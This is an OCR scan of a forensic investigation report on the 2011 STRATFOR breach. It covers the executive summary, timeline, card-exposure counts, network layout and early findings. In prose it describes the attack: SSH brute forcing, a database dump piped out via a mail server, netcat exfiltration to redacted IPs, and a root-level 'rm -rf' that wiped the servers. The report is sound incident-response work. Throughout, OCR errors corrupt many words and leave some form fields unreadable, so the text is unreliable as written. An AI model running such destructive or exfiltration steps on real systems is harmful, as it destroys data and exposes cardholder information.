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1. Executive Summary 



Date of PFI engagement 


12/30/2011 


Date lorensic investigation began 


01/03/2012 


Location(s) visited or forensicaiiy reviewed 


Systems hosted by CoreNAP in Austin, TX - 
seized by the Federai Bureau of investigation prior 
to the on-site portion of the investigation. System 
images aiso acquired from STRATFOR's Austin, 
TX office iocation. 


Summary of environment reviewed 


Card-Not-Present e-commerce environment driving 
subscription-based transactions for STRATFOR. 
Linux-based Web Servers communicate directiy 
with database and maii servers. Office 
environment inriiudinn Windows Active l^irectorv 
server and severai end-user worl<stations were 
aiso reviewed. 


Conciusive evidence of a breach (Y/N) 

!fno, please provide reasons wliy inconclusive. 


Kl Yes 


□ No 


Date(s) of intrusion 


September 29, 2011 (Earliest known intrusion) 
- December 24, 2011. 


Cause of the intrusion 


l-lost - No/Lrmited System Hardening (No File 
Integrity Monitoring): The absence of Fiie 
integrity Monitoring toois within the relevant 
systems environment aliowed the intruder(s) to 
introduce custom scripts and execute those scripts 
undetected. 

Host - System Allows Insecure Remote 
Access: Each of the affected systems (Web 
server, database server, maii servers, Active 
Directory server) in both the corporate and 
payment environments aiiowed for singie-factor 
remote access either through 3SH (Linux) or 
Windows Remote l3esl<top, RDP. 

Host - System Contains PAI/Track Data: The 

back-end database driving the STRATFOR e- 
commerce process retained Primary Account 
Number (PAN), expiry, and CVV2/CVC2 in piain, 
unencrypted text. 

Host - System Has Unrestricted 
Network/Internet Access: Each of the affected 
systems (Web server, database server, maii 
servers. Active Directory server) in both the 
corporate and payment environments aiiowed for 
singie-factor remote access either through SSiH 
(Linux) or Windows Remote Desktop, RDP. This 
access was not restricted by IP address or 
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geolocation. 

Network - No Firewall Present: At the time of 
data breacti, STRATFOR did not utiiize a statefui 
packet inspection firewaii to biock and/or filter 
traffic across higti and non-standard ports at its e- 
commerce network perimeter. No device was used 
to filter any ingress or egress traffic, aliowing any 
data into and out of ttie systems environment 
unrestricted. 

Network - No Network Segmentation: At the 

time of the data breach event, STRATFOR did not 
segregate its payment (ecommerce) environment 
from its corporate office environment. That is to 
say, systems interacting with cardholder data were 
directly accessible from systems within the 
corporate subnet with single-factor authentication 
credentials. 

Network - No Secured Remote Access: At the 

time of the breach, remote access to the 
STRATFOR environment, both the corporate and 
e-commerce subnets, was available via single- 
factor authentication (SSH and RDP). Moreover, 
these remote access channels were not restricted 
by trusted IP address or geolocation. 

Network - No Security Monitoring: During the 

timeframe of the data breach event, STRATFOR 
did not maintain any level of centralized logging to 
routinely monitor and analyze suspicious and/or 
anomalous security events. Moreover, there was 
no such procedure in place to address routine 
security event monitoring. 

Network - No/Insufficient Logging: As noted 
above, during the timeframe of the data breach 
event, STRATFOR did not maintain any level of 
centralized logging to routinely monitor and analyze 
suspicious and/or anomalous security events. For 
the purposed of this investigation, no network 
witness device logs were available beyond those 
extracted from the in-scope system images. 

Remote Access - Remote Access Left 
Permanently Enabled: During the timeframe of 
the known breach event, STRATFOR maintained 
several remote access channels to their systems 
environment that were configured in an ''always 
listening" state. Specifically, both SSH and 
Windows Remote Desktop could be used to access 
the STRATFOR environment with single-factor 
credentials (username, password). These remote 
access channels were not enabled/disabled as 



VCf iTOt tbus'ness 



Page 5 of 66 



68621 



strategic Forecasting, Inc. - Computer Forensic Report 



necessary, but rather were always available. 

Remote Access - No Monitoring/Logging of 
Remote Access: At the time ot the data breach 
event, 3TRATFOR did not have a process in place 
to actively and preemptively monitor remote access 
sessions made to the environment. Moreover, 
there was no centralized logging system In place to 
aggregate sucti logs for manual review. 



Breach: 



□ Not contained 

M Contained (specify how): In the aftermath of 
this data breach event, 3TRATFOR Is working with 
several third-party security firms to completely 
rebuild tfieir systems environment from the ground 
up. Given that tfie attacker(s) Issued rm -rf 
commands against nearly every system relevant to 
this case, 3TRATFOR was forced to rebuild 
systems. The systems originally affected by this 
breach are currently not In any Internet- facing 
production state. It should be noted that Verizon Is 
not directly involved with the environment rebuild 
process. 



On the evening of December 6, 2011, Strategic Forecasting, Inc. (STRATFOR) became aware of a 
potential data breacfi event that may have occurred against their systems environment wfiereby data 
elements may have been exflltrated from the STRATFOR database server driving their front-end 
customer-facing website. These data elements Included, but were not limited to, customer name, e-mall 
address, primary account number (PAN), expiration date, and CVC2/CVV2. The Federal Bureau of 
Investigation (FBI) was able to Identify a portion of tfie data believed to have been exflltrated from the 
STRATFOR environment, and on December 7, 201 1 , provided all known at-risk cardholder information to 
the respective card brands. 

Later, on December 24, 2011, unauthorized intruders claiming allegiance with the hacking group 
Anonymous successfully defaced the www.STRATFOR.com website, and shortly thereafter disabled the 
Web server by using the Unix ''rm -rf" command against the root directory as superuser. This caused the 
contents of nearly every writable mounted file system on the server to be deleted, up to the point that the 
server itself crashed after system-critical files or directories were deleted. This same Unix command was 
also run against two separate mall servers as well as the e-commerce database server within the 
STRATFOR environment. 

The next day, December 25, 201 1 , portions of the stolen dataset (including credit card data) were made 
public and posted to the Internet - again by individuals claiming allegiance with the hacking group 
Anonymous. Within the next several days and weeks, hackers continued to publicly release data stolen 
from the STRATFOR environment. Including further credit card numbers, customer passwords, as well as 
a sample of e-mail communications exflltrated from a STRATFOR mall server. 

In light of this unauthorized activity affecting their systems environment, STRATFOR engaged Verizon 
Business/Gybertrust on December 30, 2011 to conduct a forensic Investigation into this activity - with the 
specific focus of determining how and where the unauthorized Intruder was able to breach perimeter 
network security, and the nature of the data exflltratlon itself. At STRATFOR's request, the findings of the 
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investigation are being closeiy communicated with the Federai Bureau of Investigation (FBI) with the 
intended purpose of identifying individual actors involved in ttie known criminal activity. Consequently, 
the initial focus of this investigation will necessarily be on discovering, from a digital evidence standpoint, 
any and all information that would serve to identify the unauthorized intruders, as well as the specific 
methods used to carry out this activity. Any such information has been and will continue to be fon/varded 
to the FBI in a fully cooperative effort. 

Verizon Business' objectives in conducting this investigation were to: 1> independently determine the 
nature of the data breach, working to determine any evidence around the method of intrusion and 
identities of the intruders; 2) fully enumerate the scope of exposure around cardholder data, 3) work 
alongside STRATFOR personnel to immediately remediate any vulnerabilities determined to have been 
exploited during this scenario; and 4> leverage Netlntel data to shed light on anomaious or malicious 
network traffic into and out of the STRATFOR environment leading up to this investigation. 

Starting on January 3, 2012, and continuing through January 26, 2012, Verizon Business worked with 
STRATFOR and FBI during three separate on-site visits to acquire digital evidence sources relevant to 
the case. Prior to the onset of the investigation, the Web server, database server, mail servers, and 
relevant backups had been deleted by the intruder(s) such that their respective operating systems and file 
structure were inoperable. During each on-site visit, Verizon worked with STRATFOR and the FBI to 
acquire other relevant evidence sources, including (but not limited to) infomiation derived from the FBI's 
own investigation, a walkthrough of network topology prior to the breach, and the exfiltrated data file 
containing cardholder information. 

Throughout the investigation, Verizon made working copies of the forensic images, encrypted them, and 
then securely transported them to Verizon's secure storage facility and Forensic Analysis Environment 
(FAE) at the ICSA Labs facility in Mechanicsburg, Pennsylvania for analysis. Chain of custody 
documentation was initiated and maintained throughout this process, with appropriate sign-off conducted 
once the evidence was moved into Verizon's lab facility. 

A summary of significant findings ascertained to date by Verizon's analysis is provided below. 

To date, this investigation has confirmed that a data breach took place against Strategic 
Forecasting Inc. (STRATFOR). This incident resulted in the compromise of all cardholder 
information retained within the affected STRATFOR database server. 

• At the culmination of their unauthorized activity, on December 24, 201 1 , the intruder(s) issued a 
Unix ''rm -rP command against the STRATFOR Web server, database sen/er, mail servers, and 
relevant backups. This caused the contents of nearly every writable mounted file system on 
those systems to be deleted, up to the point that the servers themselves crashed after system- 
critical files or directories were deleted. As a result, these evidence items do not currently have 
any file structure or functional operating system. This presented an investigative challenge, as 
standard file timeline and metadata analysis cannot be conducted. 

• Verizon has fully carved the contents of the original defacement posted on December 24, 2011 
out of unallocated disk space on the Web server. Fortunately, this file was able to be recovered 
in whole, and is a fully readable/renderable html file. This file has been forwarded to both 
STRATFOR and/or the FBI at their request. The defacement file itself contained information 
around the intruder's actions, including specific reference to issuing rm -rf commands against the 
affected systems. 

• Verizon has worked to fully enumerate the scope of cardholder data included in both the 
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exliltrated dalaset, as well as the database itself. Ttiere is a slight discrepancy in the scope of 
data between the two datasets. The full card counts contained In each of the datasets Is included 
below: 



Card Brand 


In Exfiltrated Data Set 


In Database 


Visa 


37350 


38231 


MasterCard 


21589 


22078 


Discover 


1509 


1545 


Am Ex 


18614 


19068 



It should be noted that the initial data dump comprising the exfiltrated data elements was created 
on November 1 6, 201 1 . The STRATFOR Web and database environment did not actually go out 
of production until December 24, 2011. This discrepancy in card counts can be explained by 
those new customers whose information was added to the database between November 16, 
201 1 and December 24, 201 1 . 

• In analyzing unallocated disk space on the affected SMTP server, Verizon Identified the earmarks 
of a brute force attack taking against a specific employee end-user account. This included 
numerous attempts to 3SH Into the server as the user with myriad variations of the employee's 
first and last name from a system within the STRATFOR corporate environment. These 
variations included "flrstname.lastname/^ 'tirstlnltial.lastname," and '^Irstlnitlallastname'' among 
others. At the culmination of this attack, a successful log-In occurred on October 3, 2011. 
Verizon confirmed with the credentlaled employee In question that he never has or had business 
reason to SSH Into the Web server, and to his knowledge, never had done so (or failed 
authentication numerous times for that matter). The date, September 29, 2011, signifies the 
earliest evidence of brute force attack occurring to the STRATFOR SMTP mall server taking 
place from the office portion of the STRATFOR environment. This date also represents the 
earliest known Intrusion into the STRATFOR environment. 

• Verizon analyzed available Internet traffic traversing the STRATFOR environment In the months 
leading up to and during the data breach event. This Netlntel traffic analysis allowed Verizon to 
analyze traffic patterns and trends around the STRATFOR environment. Preliminary analysis of 
Netlntel data around STRATFOR's IP space reveals that on December 5, 2011, starting at 4:37 
pm Central time, an abnormally high amount of data was sent from the STRATFOR environment 
to the IP address ^^^^^^^H This data download lasts approximately 9 minutes, and 
concludes at 4:46 pm Central time. This traffic was significantly larger than normalized Web 
traffic (I.e. Individuals visiting the STRATFOR web page). Moreover, and perhaps most 
Importantly, this data was sent over port 9583 (destination port 41216). This is a non-standard 
and unasslgned port. Intruders often use custom assigned high and non-standard port numbers 
to obfuscate unauthorized data transfers out of victim environments. For example, hackers will 
frequently use high and non-standard ports for FTP and SSH traffic (instead of their standard 
ports, 21 and 22 respectively) to throw off Investigators looking tor traffic patterns along standard 
ports. 

On December 7, 2011, a second high volume data transfer occurs destined for the IP address 
^^^^^^H, In Greece. This download Is transferred via port 59630 (destination port 47608) 
and lasts a little over 2 hours - between 9:37 a.m. and 11:47 a.m. Central time. Verizon has 
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confirmed with STRATFOR personnel that these ports are not used for any standard or company 
sanctioned traffic. These IP addresses have been fon/vard to the FBI for the purposes of their 
Investigation. 

It should be noted that these traffic anomalies do not necessarily reflect a crime-ln-motlon, but 
might be Indicative of other non-legitimate activities unrelated to a data breach event. For 
example, an internal STRATFOR employee utilizing a torent client for the purposes of file 
sharing might generate a similar traffic signature with high volume outbound traffic along high, 
non-standard ports. 

• During the on-site portion of the investigation, Verizon was informed that prior to the breach, both 
the Web and database servers were directly accessible via SSH over the Internet. This was later 
confirmed upon review of database logs showing systems administrators logging into the 
database server via SSH from external IP addresses. In analyzing the remnant evidence from 
the Web server, Verizon confirmed that unauthorized external SSH connections were made to the 
Web server by the IP address ^^^^^^^H, originating in Massachusetts. This IP address 
has been forwarded to the FBI for the purposes of their investigation. 

• As noted above, evidence suggests that the data dump file containing cardholder data elements 
was created on November 16, 2011. This is derived from a timestamp shown as the final line of 
the data dump itself, created with the mysqidump utility. There is no direct evidence to suggest 
that the data dump was actually exfiltrated from the STRATFOR environment on that day - only 
that it was created that day. It should be noted that the database dump file was not found by 
investigators anywhere on the database server itself. This would tend to suggest that the 
database dump was being piped to another server in the STRATFOR environment for exfiltration. 

• In examining the remnant unallocated space on the Zimbra mail server, Verizon identified the 
database dump containing cardholder information. This finding corroborates that the database 
dump was piped from the database server to the Zimbra mail server (such that it was never 
actually written to disk on the database server) on its way to exfiltration from the STRATFOR 
environment. In essence the database dump was moved from the payment environment to the 
office environment before being stolen from the STRATFOR environment. This finding highlights 
the inherent problems around the lack of network segregation between the corporate STRATFOR 
environment and the payment and e-commerce environment. 

• With the understanding that cardholder data was exfiltrated through the STRATFOR corporate 
environment, Verizon requested access to any and all systems that were in production within the 
corporate environment at the time of the breach. In light of the known data breach event, 
STRATFOR moved to immediately wipe and rebuild most of the systems in the corporate 
environment before Verizon's involvement in the case. STRATFOR personnel advised Verizon 
that a Windows Active Directory (AD) server in production at the lime of the breach had not been 
wiped and rebuilt. fVloreover, STRATFOR personnel indicated that this system was configured to 
allow single-factor remote access to the STRATFOR environment through Windows Remote 
Desktop (RDP). In analyzing this system, Verizon found that its Windows Security Event logs 
had been cleared - suspicious in and of itself. Moreover, Verizon identified a potentially 
malicious file on the system, called "sfind.exe" (listed by McAfee as simply "New Malware.b"). If 
is unclear whether this potential malware is related to the data breach event known to have 
occurred. More information about this file is included in the Malware analysis section of this 
report. 



VBt i^H tbus'ness 



Page 9 of 66 



68625 



strategic Forecasting, Inc. - Computer Forensic Report 



• In analyzing unallocated disk space on the Zimbra mail server that acted as a conduit tor the 
extiltration of cardholder data, Verizon noted several instances of a script called ''zjsp" being 
remotely executed by and intruder from the IP address ^^^^^^^1. 8ased on analysis of 
available syntax, it appears that the output created by the execution of this script Is being sent via 
netcat to tfie IP address ^^^^^^H Given that tfils script is no longer available on the 
affected systems, the script's original purpose remains unclear It sfiould be noted that the IP 
addresses seen running the script is the same as the one seen opening remote SSH sessions to 
the Web server (as noted above). Both of tfiese IP address fiave been fon/varded to the FBI for 
the purposes of ttieir Investigation. 

It sfiould be noted also that Verizon identified the execution of two other scripts, "'bccpi" and 
''db_con.pfip,'' against the Web server by tfie unauthorized Intruder(s). Similarly, this script is also 
no longer available due to the affected servers being issued a Unix rm -rf command. The 
execution of "bcc.pl" and ""db.con.php" is also directly tied to the IP address 
(same as above) witfiin the arguments Included with tfie syntax of its execution. 

• At tfie time of the breacfi, STRATFOR ulllized the Ubercart shopping cart application, version 6.x- 
2.0-rc7. STRATFOR Is a Level 3 merchant. 

Further findings, in addition to details around those described above, can be found in tfie Findings section 
of this document. 

It should be noted that as a consequence of the events affecting STRATFOR systems, the organization is 
working to rebuild all affected systems from the ground up. It fias been determined during preliminary 
analysis that an intruder was able to access multiple systems within the environment, alter files, and 
access the database with the intention of capturing sensitive credit card data (among otfier data 
elements). As sucfi, tfiese systems can no longer be trusted to be as secure as possible. Consequently, 
Verizon Business fully concurs with STRATFOR's decision to fully rebuild all affected systems using 
trusted operating system image sources. Verizon recommends this process Involve adequate testing to 
ensure new system builds meet required security baseline standards. 

Verizon Business has compiled this report to articulate the investigative findings to date. It is important to 
note that all of the findings presented in tfiis document are based upon the personnel interviews and 
evidentiary data made available to Verizon. Tfie forensic analysis and subsequent report are based on 
the In-scope STRATFOR information technology infrastructure as it existed up until December 24, 201 1 . 
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2. Background 



Type of business entity 


Kl Merctiant (brick and mortar, 
e-commerce, or both) 


□ ATM processor 


□ Prepaid issuer 


□ Third-party service provider 
(web hosting; co-location) 


□ Issuer 


□ Encryption Support 
Organization (E30) 


□ Acquirer 


□ Payment appiication vendor 


□ Acquirer 


□ Payment appiication reseiier 


□ Issuer processor 




Other information 


Number of iocations 


1 


Parent company (if appiicabie) 


N/A 


Franchise or corporate-owned 


Singie Owner 



The subsequent information is a timeiine of events ieading up to and through the date Verizon Business 
incident Response arrived on-site. The individuai events and corresponding dates listed beiow were 
tal<en from discussions, in-person interviews, e-maii messages, and other communications between 
Verizon Business and ali other Itey parties invoived, as weil as on-site observations and forensic anaiysis. 



Timeiine of Events: 


Date 


Activity 


12/06/2011: 


On this date STRATFOR became aware of a potentiai data breach event whereby 
cardhoider information was exfiitrated from their environment. 


12/07^011: 


On this date the Federal Bureau of investigation provided aii known, at-risk cardhoider 
information to the respective card brands. 


12^4^011: 


Unauthorized intruders successfuiiy defaced the www.3TRATFOR.com website and 
shortiy thereafter disabled the V^eb and database servers as weii as two separate 
maii servers using the Unix command "rm -rl" as a superuser in the root directory. 
This caused the contents of neariy every writable mounted fiie system on the servers 
to be deieted. 


12^5^011: 


On this date, portions of the stoien dataset, including cardhoider information, were 
publpciy posted to the internet by individuals claiming allegiance with the hacking 
group Anonymous. 


12/30^011: 


On this date STRATFOR engaged Verizon Business to conduct a forensic 
investigation into the unauthorized activity affecting their systems environment. 


01/03/2012- 
01/26/2012 : 


During this timeframe Verizon Business worked with STRATFOR personnel and the 
FBI during three separate on-site visits to acquire digital evidence sources relevant to 
the investigation. 
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3. Incident Dashboard 

The date ranges and data provided below are amalgamated across all In-scope evidence sources, and 
are collectively presented as follows: 



Date when entity identified compromise 


Date: 12/06/2011 


Method of identification 


□ Self-detection 


□ Common point of purchase 


Kl Other 


Window of system vulnerability 




From: Unknown 


To: 12/24/2011 


Window of Intrusion 




From: 09/29/2011 
(Earliest known 
intrusion) 


To: 12/24/2011 


Malware Installation date(s), if applicable 


Kl Applicable: 
□ Not applicable 


From: 01/25/2011 
(No discernible 
connection 
between identified 
maiware ana 
known data 
breach events.) 


To: Current 


Date(s) of reaJ time capture, if applicable 


□ Applicable: 
Kl Not applicable 


From: N/A 


To: N/A 


Date(s) that data was transferred out of 
the network, if applicable 


□ Applicable 
^ Not applicable 


From: 11/16/2011 
(Database dump 
created on this 
date, but there is 
no evidence to 
suggest that it was 
actually exfiltrated 
on this date.) 


To: 11/16/2011 


Window of payment card data storage 




From: System 
Inception 


To: 12/24/2011 


Transaction date(s} of stored accounts 




From: System 
Inception 


To: 12/24/2011 


Payment application information: 




1. Name, version, and install date 
of application at tfie time of tfie 
breach 


Name: Ubercart 


Version: 6.X-2.0- 
rc7 


Date: Late 2007- 
(From interview). 


2. Name, version, and install date 
of current application 


Name: N/A 


Version: N/A 


Date: N/A 


3. Reseller/IT support that 
manages payment 
application/network 


N/A 
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4. Payment application vendor 


Drupai (open source) 


Name, version, and vendor of software 
that stored tfie CiD, CAV2, CVC2, 
CW2. or tracl< data 


Name of software: 


Ubercart 


vtjrbiuri. 




Vendor: 


Drupai (open source) 


Type of data exposed 


LAj odruriuiuGr ndinty 


Pv^ oin r^P\\fo c\/f^o r^\A/o 

LAJ \jt\viL, UVLni, \jvv/l 


LAJ Ud.ruriUHJ(Jf dCHJrtJ&a 


\ 1 1 rdCK Udld (irdL-K 1 , Or 

both) 


^ PAN 


□ Encrypted or ciear-text 
PINs or PiN Biocks 


S Expiry date 


□ None 


Brand exposure 


Visa 


^ AMEX 


K MasterCard 


□ JOB 


Discover 


□ Other 


Number ol cards exposed: 


79,062 


a. Breakdown bv Payment Card 
Brand: 


American Express 


18,614 


Discover 


1,509 


MasterCard 


21,589 


Visa 


37,350 


b. Breakdown of thefoiiowing: 


Signature 




PiN-based transactions 




issuer-oniy data 


79,062 


Non-issuer 




Prepaid data 




Logs tfiat provided evidence: 


□ Firewali iogs 


□ Fiie-integrity monitoring 
output 


□ Transaction iogs 


□ Intrusion-detection 

systems 


Kl Database queries 


13 Remote-access iogs 


□ FTP server logs 


□ Wireiess connection iogs 


Kl System iogin records 


□ Anti-virus iogs 


Web server iogs 


□ Security event iogs 


□ Hardware Security 
Moduie(HSM) iogs 


M Other: Linux maii iogs. 
Bash iHistory 


Fiie creation/access date: 


Creation: N/A 


Access: N/A 
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Suspected cause summary and list of 
attack vectors: 


Host - No/Limited System Hardening (No File Integrity 
Monitoring): Ttie absence of Fiie integrity Monitoring toois 
wittiin ttie relevant systems environment allowed ttie 
intruder(s) to introduce custom scripts and execute ttiose 
scripts undetected. 

Host - System Allows Insecure Remote Access: Eacti of 
ttie affected systems (Web server, database server, mail 
servers, Active Directory server) in both ttie corporate and 
payment environments allowed for single-factor remote 
access eittier ttirougti 3SH (Linux) or Windows Remote 
Desktop, RDP. 

Host - System Contains PAI/Track Data: Ttie back-end 
database driving ttie 3TRATF0R e-commerce process 
retained PAN, expiry, and CW2/CVC2 in plain text, 
unencrypted. 

Host -System Has Unrestricted Network/Internet Access: 

Each of the affected systems (Web server, database server, 
mail servers, Active Directory server) in both the corporate 
and payment environments allowed for single-factor remote 
access either through 3SH (Linux) or Windows Remote 
Desktop, RDP. This access was not restricted by IP address 
or geoiocation. 

Network - No Firewall Present: At the time of data breach, 
STRATFOR did not utilize a statetui packet inspection firewall 
to block and/or filter traffic across high and non-standard ports 
at its e-commerce network perimeter. No device was used to 
filter any ingress or egress traffic, allowing any data into and 
out of the systems environment unrestricted. 

Network - No Network Segmentation: At the time of the 
data breach event, STRATFOR did not segregate its payment 
(ecommerce) environment from its corporate office 
environment. That is to say, systems interacting with 
cardholder data were directly accessible from systems within 
the corporate subnet with single-factor authentication 
credentials. 

Network - No Secured Remote Access: At the time of the 
breach, remote access to the STRATFOR environment, both 
the corporate and e-commerce subnets was available via 
single-factor authentication (SSH and RDP). Moreover, these 
remote access channels were not restricted by trusted IP 
address or geoiocation. 

Network - No Security Monitoring: During the timeframe of 
the data breach event, STRATFOR did not maintain any level 
of centralized logging to routinely monitor and analyze 
suspicious and/or anomalous security events. Moreover, 
there was no such procedure in place to address routine 
security event monitoring. 
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Network - No/Insufficient Logging: As noted above, during 
ttie timeframe of the data breach event, STRATFOR did not 
maintain any level of centralized logging to routinely monitor 
and analyze suspicious and/or anomalous security events. 
For the purposed of this investigation, no network witness 
device logs were available beyond tfiose extracted from tfie 
in-scope system Images. 




Remote Access - Remote Access Left Permanently 
Enabled: During the timeframe of the known breach event, 
STRATFOR maintained several remote access channels to 
their systems environment that were configured in an "always 
listening'' state. Specifically, both S3H and Windows Remote 
Desktop could be used to access the STRATFOR 
environment with single-factor credentials (username, 
password). These remote access channels were not 
enabled/disabled as necessary, but rather were always 
available. 




Remote Access - No Monitoring/Logging of Remote 
Access: At the time of the data breach event, STRATFOR 
did not have a process In place to actively and preemptively 
monitor remote access sessions made to the environment. 
Moreover, there was no centralized logging system In place to 
aggregate such logs for manual review. 


Assessment of residual risk 


fs card data still at risk? □ Yes M No 


Date and case number from law 
enforcement report: 


Date: N/A 


Case Number: N/A 


If the case has not been reported to law 
enforcement, please explain why 


The FBI is currently involved In this case, but a specific case 
number is currently unavailable. 


If applicable, document the type of cryptographic 
keys at risk. 


Kl Not applicable 


Issuer Side Cryptographic Keys 


Acquirer Side Cryptographic Keys 


□ Issuer Working Keys (IWK) 


□ Acquirer Working Keys (AWK) 


□ PIN Verification Keys (PVK) 


□ POS, ATM, EPP PIN Encryption Keys 


□ PIN Generation Keys 


□ POS, ATM, EPP Key- Encrypting Keys {KEKs) 


□ Master Derivation Keys (MDK) 


□ Remote Initialization Keys 


□ Host-to-Host Working Keys 


□ Host-to-Host Working Keys 


□ Key-Encrypting Keys (KEKs) 


□ Key-Encrypting Keys (KEKs) 


□ Switch Working Keys 


□ Switch Working Keys 


□ Other (describe): 


□ Other (describe): 
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4. Network Infrastructure Overview 

To efficiently and accurately Investigate a potential data compromise, It is important that eacfi individual 
Involved in the investigative process have a clear knowledge ot the IT systems Infrastructure and layout at 
the time of the breach. During the engagement, Verizon focused on facilitating a solid knowledge transfer 
between STRATFOR personnel and the investigators regarding the environment and systems 
Infrastructure at the time of the data breach. With a firm understanding of all network and system-related 
elements deployed within the environment, Verizon could more accurately analyze the breach event. 

4.1. Network Diagram 



Verizon Business produced a diagram based on Interviews with STRATFOR personnel. The diagram 
represents the In-scope system architecture as it existed at the time of breach and is as follows: 




E-Commerce Corporate / Office Environment 

CoreNAP Hosted Environment STRATFOR Offices - TW Telecom 



Figure 4.1.1 - HIgh-Level Network Diagram 

The illustration above depicts the in-scope STRATFOR network architecture hosted at both a CoreNAP 
datacenter In Austin, TX as well as the STRATFOR offices (also In Austin) at the time of the breach. The 
outlined network diagram included In this section Is a high-level composite of both the Web-facing 
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www.STRATFOR.com in-scope information systems infrastructure, as well as several relevant 
components ot the STRATFOR office environment that were brought in scope for the investigation. It 
should be noted that during the timeframe of the intrusion and data breach, the e-commerce environment 
was not protected by any firewall appliance or other software-level firewall implementation. As the 
illustration depicts, the STRATFOR website, as it was hosted at an Austin CoreNAP datacenter facility, 
maintained both an Internet facing component for external users (the website itself), as well as 
connectivity through alternate channels originally purposed for internal users in an administrative 
capacity. Specifically, during the time-frame of the data breach, each of the servers depicted in the 
CoreNAP section ot the diagram above was accessible to the outside world via single-factor 
authentication over S3H. 

The database server (^^^^^^^^^^B, above) managed data queries originating from both internal 
systems as well external Web requests as they related to customers querying account data. This is 
noteworthy, as an important facet of this data breach was the initiation of a database dump against the 
database server originating from a server in the corporate / office environment, the Zimbra mail server. 
The STRATFOR customer-facing Web portal as depicted above is built around the Drupal open source 
content management platform running on an Apache front-end and utilizing a MySQL database back-end. 

Relative to administrative access to this environment, systems and servers were designed to be 
accessible via S3H from both internal systems and the outside world. This would require only the 
internet-facing system IP address, a username, and a password. This was not unknown to STRATFOR 
personnel, as employees would routinely access systems from home or otherwise outside the office. This 
facet of the network design became a focal point of this investigation due to its potential avenue as an 
attack and intrusion vector. 

Also noteworthy is that the two subnets described in the network above were not segregated from one 
another in an access restrictive way. This design was partially deliberate, in that administrators (working 
from the corporate office environment) would necessarily need to access the Web server for maintenance 
and break-fix situations. Although updates and maintenance to the website itself could be handled 
through access to the Drupal content management platform itself (by accessing the admin URL for the 
website), system-level changes, updates, patches, and maintenance necessitated unrestricted system 
level access (i.e. not through the application). This ability for a user to move between environments 
without traversing a firewall or other authentication check tied directly into the breach of cardholder data, 
as evidence strongly suggests that cardholder data was dumped from the e-commerce environment to 
the office environment before being exfiltrated. 

In conducting a network exercise though interviews with STRATFOR personnel, Verizon discovered that 
at the time of the breach, there was a Windows Active Directory (AD) server that oversaw a portion of the 
users in the corporate environment. Similar to the other Web, database, and e-mail servers in this case, 
this server had the ability to connect to systems not only in the office environment, but also the e- 
commerce environment. (Moreover, this system was, at the time of the breach, configured with Windows 
RDP in a listening state such that remote users could remotely access it with the appropriate credential 
set (username and password). 

As a necessary consequence of this authentication schema and information flow at the time of the data 
breach event, it was possible for an unauthorized user to gain system-level access STRATFOR servers 
with single-factor authentication credentials from anywhere in the world. As such, it became the focal 
point of this investigation to determine whether the compromise of some ot those authentication 
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credentials were accessed by an unauthorized intruder as a result of a direct system ievei data breacti 
taking piace against any of ttie system or servers in-scope for ttie investigation. 

It shouid be noted ttiat at ttie time of the data breacti event, ttie e-commerce environment did not 
maintain a statefui packet inspection firewaii in eittier tiardware or software form. Additionaily, ttie firewaii 
impiementation at the office network perimeter did not maintain any ievel of iogging beyond that which 
was retained in the firewafi buffers. From an investigative standpoint, this meant that findings coming 
from forensic disk and anaiysis as weii as Netintei anaiysis could not be correiated with perimeter firewaii 
iogging. As a resuit, ttiere were severai instances where investigators were abie to identify anomalous 
logins or traffic from or around the office environment, but were unable to determine ttie specific systems 
or end-user workstations. 

At the culmination of Verizon's examination of ttie network architecture and information flow into and out 
of ttiis environment, Verizon has concluded that gaining unauthorized system-level access to any of the 
systems outlined in the corporate STRATFOR environment in the diagram above, would also grant an 
attacker access to the e-commerce environment with the same credentials and vice-versa. Essentially, 
the lack of network segregation within the network architecture would mean that a technical breach of one 
side of this environment would like so facilitate a technical breach of the other. 




Page 18 of 66 



68634 



strategic Forecasting, inc. - Computer Forensic Report 

4.2. Payment Card Flow 

A high level overview of the flow of payment card auttiorlzatlon information Ifirough the 3TRATFOR 
environment at the time of the breach Is as follows: 



Web Server 
www slratfor com 




MySQL Database Server 



Figure 4.2.1 - High-Level Payment Card Flow 

During the time-frame of known data breach event, payment card authorizations within the 3TRATFOR 
environment were conducted in near real time and began with a customer purchase (typically to become 
a member of STRATFOR's subscription service) through a standard Web browser by visiting 
www.3TRATFOR.com. After that initial transaction, future transactions, based on the customer's 
preference, could become recurring. These purchases were handled within the 8TRATFOR environment 
through the use of the Ubercart shopping cart application hosted on the www.3TRATFOR.com Web 
server. Ubercart Is a component of the open source Drupal content management platform used to drive 
STRATFOR's consumer-facing Web content. At the time of the breach, Ubercart version 6.x-2.0-rc7 was 
In use within the 3TRATFOR environment. Subsequent to the Initial entry of transaction Information 
through a customer Web browser, the cardholder data was sent from the originating device over 3SL 
through the Ubercart application on the Web server. The Web server would In turn take all transactions 
and connect to the Bancorp Bank for authorization and processing through an encrypted 33L connection. 
Once the card and transaction Is verified. The Bancorp Bank forwarded the acceptance notice back 
through the e-commerce environment, which finally sent the information along the same return route to 
the originating device to accept the transaction. After initial authorization, the customer information 
Initially driving the transaction was forwarded and stored In the back-end My3QL database In plain text 
(unencrypted) format - all cardholder primary account numbers, expiration dates, and CVC2/CVV2 values 
were stored as used for recurring subscription transactions as necessary. It was this stored information 
that was dumped using the My3QLdump utility and exfiltrated during the attack (3ee Payment Card 
ExflHration section for more Information). 



VBt i^H tbus'ness 



Page 19 of 66 



68635 



strategic Forecasting, Inc. - Computer Forensic Report 



5. Findings 

Specilic findings and results of tfiis investigation can be separated into severai categories tfiat first iayout 
an attacl^ timeiine of events, ttien a damage assessment, foiiowed by potentiai vuinerabiiities, security 
posture, network modifications, and finaiiy tfireat-specific data, iHighiights of ffie findings are presented 
beiow, witfi further granularity provided in ffie sections that foiiow. 

Quicl( Facts: 

• Tfie intruder(s) issued a Unix "rm -rT command against severai 3TRATFOR servers, causing 
the contents of nearly every writable mounted file system on those systems to be deleted, up to 
the point that the servers themselves crashed. This presented an investigative challenge, as 
standard file timeline and metadata analysis could not be conducted. 

• Verizon has worked to fully enumerate the scope of cardholder data included in both the 
exfiltrated dataset, as well as the database itseif. This information has been communicated to 
the card brands as appropriate. 

• September 29, 2011 represents the earliest known intrusion into the GTRATFOR environment. 
Evidence suggests that on this date a brute force-style attack from the STRATFOR office 
environment began at which on October 3, 2011 granted unauthorized 3SH access to the 
STRATFOR SMTP mall server. 

• In analyzing available net flow traversing the STRATFOR environment in the months leading up 
to and during the data breach event Verizon noticed several anomalies around specific IP 
addresses receiving high volume traffic from STRATFOR over high and non-standard port 
